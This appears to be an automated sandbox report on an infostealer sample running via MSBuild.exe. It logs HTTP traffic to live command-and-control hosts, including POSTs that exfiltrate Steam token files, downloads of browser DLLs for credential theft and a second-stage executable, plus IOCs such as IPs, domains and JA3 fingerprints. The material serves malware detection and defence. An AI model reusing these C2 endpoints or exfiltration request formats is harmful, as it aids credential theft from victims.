name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="file_data"qNE4Mg==------DHIECGCAEBFIIDHIDGIE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: proxy.johnmccrea.comContent-Length: 114021Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="mode"5------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: playd.healthnlife.pkCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: proxy.johnmccrea.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 37 32 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="mode"51------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="task_id"1272547------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="status"1------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="mode"6------IJKJDAFHJDHIEBGCFIDB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: cowod.hopto.orgContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 147.45.44.104 147.45.44.104
Source: Joe Sandbox View IP Address: 45.132.206.251 45.132.206.251
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CH-NET-ASRO CH-NET-ASRO
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: LIFELINK-ASRU LIFELINK-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:57015 -> 147.45.44.104:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beearvagueo.site
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00406963
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //sql.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //freebl3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //mozglue.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //msvcp140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //softokn3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //vcruntime140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //nss3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: playd.healthnlife.pkCache-Control: no-cache
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: / https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: LRPC-e9c77b0923665da6f1a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=f3480da2fdb3d1182bfb98f2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34832Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 04 Oct 2024 07:52:44 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ]steamstatic.beearvagueo.sitebeearvagueo.site/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: proxy.johnmccrea.com
Source: global traffic DNS traffic detected: DNS query: playd.healthnlife.pk
Source: global traffic DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic DNS traffic detected: DNS query: questionsmw.store
Source: global traffic DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic DNS traffic detected: DNS query: treatynreit.site
Source: global traffic DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic DNS traffic detected: DNS query: mysterisop.site
Source: global traffic DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic DNS traffic detected: DNS query: beearvagueo.site
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beearvagueo.site
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.GDAAKEBFIJDG
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.BFIJDG
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/M
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgJDG
Source: file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoEBFIJDG
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
